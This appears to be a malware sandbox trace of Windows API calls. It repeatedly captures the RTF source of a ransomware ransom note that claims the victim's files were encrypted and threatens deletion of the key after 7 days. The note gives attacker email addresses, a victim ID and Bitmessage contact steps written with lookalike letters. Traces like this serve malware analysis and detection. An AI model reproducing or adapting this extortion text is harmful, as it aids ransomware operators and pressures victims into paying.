COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.641] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 